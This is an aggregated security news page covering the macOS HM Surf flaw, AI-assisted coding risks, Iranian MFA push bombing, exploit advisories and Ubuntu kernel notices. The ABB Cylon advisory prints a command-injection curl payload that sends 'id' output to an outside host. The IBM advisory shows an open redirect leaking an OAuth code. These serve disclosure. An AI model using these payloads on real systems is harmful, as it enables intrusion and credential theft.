Microsoft disclosed details about the HM Surf vulnerability that  could allow an attacker to gain access to the user’s data in Safari

The Microsoft Threat Intelligence team disclosed details about a macOS vulnerability, dubbed “HM Surf,” that could allow an attacker to gain access to the user’s data in Safari. The data the attacker could access without users’ consent includes browsed pages, along with the device’s camera, microphone, and location.

The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later).

It is important to note that this vulnerability would only impact Mobile Device Management (MDM) managed devices. MDM managed devices are typically subject to centralized management and security policies set by the organization’s IT department.

Microsoft has dubbed the flaw “HM Surf.” By exploiting this vulnerability an attacker could bypass the macOS Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data.

Users may notice Safari’s TCC in action when they browse a website that requires access to the camera or the microphone. They may see a prompt like this one:

Image courtesy of Microsoft

What Microsoft discovered was that Safari maintains its own separate TCC policy which it maintains in various local files.

At that point Microsoft figured out it was possible to modify the sensitive files, by swapping the home directory of the current user back and forth. The home directory is protected by the TCC, but by changing the home directory, then change the file, and then making it the home directory again, Safari will use the modified files.

The exploit only works on Safari because third-party browsers such as Google Chrome, Mozilla Firefox, or Microsoft Edge do not have the same private entitlements as Apple applications. Therefore, those apps can’t bypass the macOS TCC checks.

Microsoft noted that it observed suspicious activity in the wild associated with the Adload adware that might be exploiting this vulnerability. But it could not be entirely sure whether the exact same exploit was used.

> “Since we weren’t able to observe the steps taken leading to the activity, we can’t fully determine if the Adload campaign is exploiting the HM surf vulnerability itself. Attackers using a similar method to deploy a prevalent threat raises the importance of having protection against attacks using this technique.”

We encourage macOS users to apply these security updates as soon as possible if they haven’t already.

Malwarebytes for Mac takes out malware, adware, spyware, and other threats before they can infect your machine and ruin your day. It’ll keep you safe online and your Mac running like it should.

 Unauthorized data access vulnerability in macOS is detailed by Microsoft 

This year, the majority of developers have adopted AI assistants to help with coding and improve code output, but most are also creating more vulnerabilities that take longer to remediate.

Source: Gorodenkoff via Shutterstock

Less than two years after the general release of ChatGPT, most software developers have adopted AI assistants for programming. That's boosting efficiency, but at the same time, it's led to a higher cadence of software development that has made maintaining security more difficult.

Developers are on track to download more than 6.6 trillion software components in 2024, which includes a 70% increase in downloads of JavaScript components and a 87% increase in Python modules, according to the annual "State of the Software Supply Chain" report from Sonatype. At the same time, the mean time to remediate vulnerabilities in those open source projects has grown significantly over the past seven years, from about 25 days in 2017 to more than 300 days in 2024.

One likely reason: The advent of AI is driving speedier development cycles, making security more difficult, says Brian Fox, chief technology officer of Sonatype. The majority of developers now use AI tools in their development process according to a recent Stackoverflow survey, with 62% of coders saying they used an AI assistant, up from 44% last year.

"AI has quickly become a powerful tool for speeding up the coding process, but the pace of security has not progressed as quickly, and it’s creating a gap that is leading to lower-quality, less-secure code," he says. "We’re headed in the right direction, but the true benefit of AI will come when developers don’t have to sacrifice quality or security for speed."

Related:News Desk 2024: Hacking Microsoft Copilot Is Scary Easy

Security researchers have warned that AI code generation could result in more vulnerabilities and novel attacks. For instance, a group of researchers demonstrated the ability to poison the large language models (LLMs) used for code generation with maliciously exploitable code at the USENIX Security Symposium in August. In March, researchers with an LLM security vendor showed that attackers could use AI hallucinations as a way to direct developers and their applications to malicious packages.

Developers also have growing concerns over the potential for AI assistants to suggest or propagate vulnerable code. While the majority of developers (56%) expect AI assistants to provide usable code, only 23% expect the code to be secure, while a larger group (40%) don't believe AI assistants provide secure code at all, according to research by software development firm JetBrains and the University of California at Irvine, published in June.

Open source projects take longer to remediate vulnerabilities. Source: Sonatype

Many developers remain nonplussed by the speed of change wrought by AI coding tools, and there is likely more to come, says Jimmy Rabon, senior product manager with Black Duck Software, a software-integrity tools provider.

Related:Chinese Researchers Tap Quantum to Break Encryption

"We haven't seen the long-term effects of adding something that can code at the level of a junior- or intermediate-level developer and at massive scale," he says. "My expectation is that we will see more intermediate mistakes — the basic mistakes that you would make as a junior or intermediate level developer — and \[issues with\] understanding the context of where some of the data flows."

**2024: The Year of the Developer's AI Assistant**

While AI assistants are now being used by the majority of developers, in business environments, adoption of AI tools is much higher — more than 90% of developers used AI assistants, according to Black Duck's 2024 Global State of DevSecOps survey. AI as a tool for developers is well-entrenched and "will never go away," Rabon says.

Yet many developers don't have the experience to judge whether code provided by an AI assistant is safe. Entry-level developers, for example, are more trusting of AI-produced code than their professional counterparts, with 49% trusting the accuracy of AI-generated code versus 42% for more experienced developers, according to Stackoverflow's annual developer survey.

Related:WP Engine Accuses WordPress of 'Forcibly' Taking Over Its Plug-in

In addition, AI tools will affect the education of developers and could make it harder for those entry-level developers to gain the skill needed to advance in their careers, experts say. The reliance on AI to complete simple programming projects could reduce the need for new or entry-level developers who typically tackle simpler coding tasks, removing a training path, Sonatype's Fox says.

"The development community is aging, and the introduction of AI poses potential risks to younger generations," he says. "If AI can handle the tasks previously assigned to budding developers, how will they gain the experience needed to replace older developers exiting the industry?"

**Automatic Generation of Secure Code**

Until the companies behind AI assistants create training datasets that contain secure code suggestions, or put in place guardrails to protect against vulnerable and malicious code generation, companies will have to deploy automated software security tools to check the work of any coding assistant.

The good news is, between the additional security checks and the fast evolution of code-generation assistants, the security of software and applications could eventually become much stronger, says Black Duck's Rabon.

"There are certain basic security flaws that I think will disappear," he says. "If you asked an AI system to generate code, why should it ever \[suggest an insecure function?\] ... I don't think that we've had enough time to really see the dramatic effects of \[such capabilities\] or prove them out."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Vulnerabilities, AI Compete for Software Developers' Attention

Iranian hackers are targeting critical infrastructure organizations with brute force tactics. This article explores their techniques, including MFA…

Iranian hackers are targeting critical infrastructure organizations with brute force tactics. This article explores their techniques, including MFA push bombing and credential theft. Learn how to protect your organization from these advanced threats and implement effective security measures.

A joint cybersecurity advisory issued by CISA, FBI, NSA, and international partners warns critical infrastructure organizations about Iranian hackers targeting their networks. These threat actors gain unauthorized access to critical infrastructure across various sectors, including healthcare, government, IT, engineering, and energy.

The attackers primarily rely on brute force tactics like password spraying exploiting common password combinations across multiple accounts to gain access. However, they also employ other methods for initial compromise, which are currently unknown.

According to the advisory, hackers have been using valid email accounts, often obtained through brute force, to gain initial access to Microsoft 365, Azure, and Citrix systems. In some instances, the actors exploit vulnerabilities in multi-factor authentication (MFA) by bombarding users with login requests until they accidentally approve access. This technique is known as “MFA fatigue” or “push bombing.”

In two confirmed cases, attackers exploited a compromised user’s open MFA registration and a self-service password reset tool linked to a public-facing Active Directory Federation Service. These threat actors may also take advantage of expired passwords or compromised accounts to gain initial access.

****Credential Theft and Maintaining Persistence:****

Once inside the network, the Iranian actors take steps to maintain persistent access. This often involves registering their own devices with MFA using compromised accounts to maintain access even if the legitimate user’s password is changed.

In addition, they leverage techniques like Remote Desktop Protocol (RDP) to move laterally within the network, allowing them to access additional resources and potentially escalate privileges.

The attackers utilize various methods to steal additional credentials within the network. This may involve using open-source tools to harvest credentials or exploiting vulnerabilities to access Active Directory information. They may also attempt to escalate privileges, potentially granting them higher levels of control within the system. This could allow them to manipulate or disrupt critical systems.

****Living off the Land (LOTL):** **

Iranian threat actors leverage legitimate system tools and techniques to gather information about the network and identify valuable targets. This approach, known as “living off the land,” allows them to evade detection by appearing as legitimate users.

The actors can use various Windows command-line tools to gather information about domain controllers, trusted domains, and user accounts. Additionally, they may use specific queries to search Active Directory for detailed information about network devices.

Avishai Avivi, CISO at SafeBreach, emphasizes that the CISA alert on Iranian cyber actors is a timely reminder, especially during cybersecurity awareness month, about the abuse of “MFA Exhaustion.” He warns that malicious actors hope users will mindlessly approve MFA requests. Avivi advises users to always verify MFA prompts to ensure they initiated the session, as attackers frequently test stolen credentials and aim to exploit MFA fatigue. Although the alert focuses on critical infrastructure, this diligence applies to protecting both personal and work accounts.

****The End Goal****

The primary goal of this campaign is believed to be credential theft and information gathering. Once they gain access, they can steal user credentials and internal network information. They may download files related to gaining remote access to the organization or its inventory. This information could then be used for further malicious activity such as data exfiltration or sold on cybercriminal forums.

The advisory recommends critical infrastructure organizations implement strong password policies and enforce multi-factor authentication (MFA) for all user accounts, and MFA settings should be regularly reviewed to prevent vulnerabilities.

1.  Censys Uncovers Hidden Infrastructure of Iranian Fox Kitten Group
2.  Iran’s MuddyWater APT Hits Saudis, Israelis with BugSleep Backdoor
3.  Iranian State Hackers Team Up with Ransomware Gangs to Attack US
4.  Dutch Man Deployed Stuxnet via Water Pump to Disable Iran’s Nukes
5.  Iran’s Peach Sandstorm Deploy FalseFont Backdoor in Defense Sector

Iranian Hackers Target Microsoft 365, Citrix Systems with MFA Push Bombing

This Metasploit module uses a combination of an arbitrary file read (CVE-2024-34102) and a buffer overflow in glibc (CVE-2024-2961). It allows for unauthenticated remote code execution on various versions of Magento and Adobe Commerce (and earlier versions if the PHP and glibc versions are also vulnerable). Versions affected include 2.4.7 and earlier, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier.

Magento / Adobe Commerce Remote Code Execution

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the file HTTP POST parameter called by the databaseFileDelete.php script.

  
ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'file' HTTP POST parameter called by the databaseFileDelete.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5845  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5845.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/databaseFileDelete.php" \  
> -d "file2=$(curl -A \"`id`\" remotelog.zeroscience.mk)\  
> &delete2=1\  
> &total=3\  
> &submitDeleteForm=Delete" ; ./incom -l httplog &  
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>  
[1]  + 38937 done       incom

$ cat httplog  
------ remotelog ------  
GET / HTTP/1.1  
User-Agent: uid=48(apache) gid=48(apache) groups=48(apache),0(root)  
Host: remotelog.zeroscience.mk  
Accept: */*  
------ remotelog ------

ABB Cylon Aspect 3.08.01 databaseFileDelete.php Command Injection

IBM Security Verify Access versions 10.0.0 through 10.0.8 suffer from an OAUTH related open redirection vulnerability.

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow

======== < Table of Contents >  
================================================

  0. Overview  
  1. Detailed Description  
  2. Proof Of Concept  
  3. Solution  
  4. Disclosure Timeline  
  5. References  
  6. Credits  
  7. Legal Notices

======== < 0. Overview >  
======================================================

  Revision:  
    1.0

  Impact:  
    By persuading a victim to visit a specially crafted Web site, a remote  
    attacker could exploit this vulnerability to spoof the URL displayed  
    to redirect a user to a malicious Web site that would appear to be  
    trusted. This could allow the attacker to obtain highly sensitive  
    information or conduct further attacks against the victim.

  Severity:  
    NIST: High  
    IBM: Medium

  CVSS Score:  
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:  
    CVE-2024-35133

  Vendor:  
    IBM

  Affected Products:  
    IBM Security Verify Access  
    IBM Security Verify Access Docker

  Affected Versions:  
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network  
    security policy management solution. It provides end-to-end protection  
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security  
    Verify Access provides authentication, authorization, data security, and  
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:  
    Authentication ~ Provides a wide range of built-in authenticators and  
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected  
resources  
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure  
access  
    to private internal network-based resources by using the public  
Internet's  
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description >  
==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an  
  Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.

  It was possible to bypass the parser's logic responsible for verifying the  
  correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
  flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
  in the Uniform Resource Identifier (URI).

  By providing as the "username" field a legitimate and expected domain, it  
  was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
  and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
  not only altering the expected flow and redirect a user to a malicious  
  Web site that would appear to be trusted.

  This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts >  
=============================================

===== REQUEST =====

[[  
  GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
  Host: [REDACTED]  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
  Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  Accept-Language: en-US,en;q=0.5  
  Accept-Encoding: gzip, deflate, br  
  Upgrade-Insecure-Requests: 1  
  Sec-Fetch-Dest: document  
  Sec-Fetch-Mode: navigate  
  Sec-Fetch-Site: same-origin  
  Sec-Fetch-User: ?1  
  Te: trailers  
  Connection: close  
]]

===== RESPONSE =====

[[  
  HTTP/1.1 302 Found  
  content-language: en-US  
  date: Tue, 19 Mar 2024 16:04:35 GMT  
  location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
  p3p: CP="NON CUR OTPi OUR NOR UNI"  
  x-frame-options: DENY  
  x-content-type-options: nosniff  
  cache-control: no-store  
  x-xss-protection: 1; mode=block  
  x-permitted-cross-domain-policies: none  
  cross-origin-resource-policy: same-site  
  content-security-policy: frame-ancestors 'none'  
  referrer-policy: no-referrer-when-downgrade  
  strict-transport-security: max-age=31536000; includeSubDomains  
  pragma: no-cache  
  Content-Length: 0.  
]]

======== < 3. Solution >  
======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline >  
===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
  21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
  02/04/2024 - Vulnerability shared with IBM  
  02/04/2024 - Vulnerability taken over by IBM  
  14/05/2024 - Vulnerability confirmed by IBM  
  18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References >  
====================================================

  (1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
  (4) https://cwe.mitre.org/data/definitions/178.html

======== < 6. Credits >  
=======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/  
    https://github.com/Ozozuz

======== < 7. Legal Notices >  
================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert  
  electronically. It may not be edited in any way without mine express  
  written consent. If you wish to reprint the whole or any  
  part of this alert in any other medium other than electronically,  
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate  
  at the time of publishing based on currently available information.  
  Use of the information constitutes acceptance for use in an AS IS  
  condition.  
  There are no warranties with regard to this information. Neither the  
  author nor the publisher accepts any liability for any direct,  
  indirect, or consequential loss or damage arising from use of,  
  or reliance on,this information.

IBM Security Verify Access 10.0.8 Open Redirection

Ubuntu Security Notice 7076-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7076-1October 17, 2024linux-azure, linux-azure-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Microsoft Azure Network Adapter (MANA) driver;  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-27397, CVE-2024-45016, CVE-2024-45001, CVE-2024-38630)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1074-azure   5.15.0-1074.83  linux-image-azure-lts-22.04     5.15.0.1074.72Ubuntu 20.04 LTS  linux-image-5.15.0-1074-azure   5.15.0-1074.83~20.04.1  linux-image-azure               5.15.0.1074.83~20.04.1  linux-image-azure-cvm           5.15.0.1074.83~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7076-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1074.83  https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1074.83~20.04.1

Ubuntu Security Notice USN-7076-1

Ubuntu Security Notice 7074-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7074-1October 17, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Microsoft Azure Network Adapter (MANA) driver;  - Network traffic control;(CVE-2024-45016, CVE-2024-45001)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1016-azure    6.8.0-1016.18  linux-image-6.8.0-1016-azure-fde  6.8.0-1016.18  linux-image-azure               6.8.0-1016.18  linux-image-azure-fde           6.8.0-1016.18After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7074-1  CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/6.8.0-1016.18

Ubuntu Security Notice USN-7074-1

Ubuntu Security Notice 7073-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7073-2October 17, 2024linux-azure, linux-azure-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Memory management;  - Network traffic control;(CVE-2024-27397, CVE-2024-38630, CVE-2024-45016, CVE-2024-26960)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1139-azure    5.4.0-1139.146  linux-image-azure-lts-20.04     5.4.0.1139.133Ubuntu 18.04 LTS  linux-image-5.4.0-1139-azure    5.4.0-1139.146~18.04.1                                  Available with Ubuntu Pro  linux-image-azure               5.4.0.1139.146~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7073-2  https://ubuntu.com/security/notices/USN-7073-1  CVE-2024-26960, CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1139.146

Ubuntu Security Notice USN-7073-2

Ubuntu Security Notice 7069-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7069-2October 17, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - x86 architecture;  - Cryptographic API;  - CPU frequency scaling framework;  - HW tracing;  - ISDN/mISDN subsystem;  - Media drivers;  - Network drivers;  - NVME drivers;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - VFIO drivers;  - Watchdog drivers;  - JFS file system;  - IRQ subsystem;  - Core kernel;  - Memory management;  - Amateur Radio drivers;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - Network traffic control;  - TIPC protocol;  - XFRM subsystem;  - Integrity Measurement Architecture(IMA) framework;  - SoC Audio for Freescale CPUs drivers;  - USB sound devices;(CVE-2024-36971, CVE-2024-42271, CVE-2024-38630, CVE-2024-38602,CVE-2024-42223, CVE-2024-44940, CVE-2023-52528, CVE-2024-41097,CVE-2024-27051, CVE-2024-42157, CVE-2024-46673, CVE-2024-39494,CVE-2024-42089, CVE-2024-41073, CVE-2024-26810, CVE-2024-26960,CVE-2024-38611, CVE-2024-31076, CVE-2024-26754, CVE-2023-52510,CVE-2024-40941, CVE-2024-45016, CVE-2024-38627, CVE-2024-38621,CVE-2024-39487, CVE-2024-27436, CVE-2024-40901, CVE-2024-26812,CVE-2024-42244, CVE-2024-42229, CVE-2024-43858, CVE-2024-42280,CVE-2024-26641, CVE-2024-42284, CVE-2024-26602)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS  linux-image-4.15.0-1182-azure   4.15.0-1182.197~16.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1182.197~16.04.1                                  Available with Ubuntu ProUbuntu 14.04 LTS  linux-image-4.15.0-1182-azure   4.15.0-1182.197~14.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1182.197~14.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7069-2  https://ubuntu.com/security/notices/USN-7069-1  CVE-2023-52510, CVE-2023-52528, CVE-2024-26602, CVE-2024-26641,  CVE-2024-26754, CVE-2024-26810, CVE-2024-26812, CVE-2024-26960,  CVE-2024-27051, CVE-2024-27436, CVE-2024-31076, CVE-2024-36971,  CVE-2024-38602, CVE-2024-38611, CVE-2024-38621, CVE-2024-38627,  CVE-2024-38630, CVE-2024-39487, CVE-2024-39494, CVE-2024-40901,  CVE-2024-40941, CVE-2024-41073, CVE-2024-41097, CVE-2024-42089,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42229, CVE-2024-42244,  CVE-2024-42271, CVE-2024-42280, CVE-2024-42284, CVE-2024-43858,  CVE-2024-44940, CVE-2024-45016, CVE-2024-46673

Tag

#vulnerability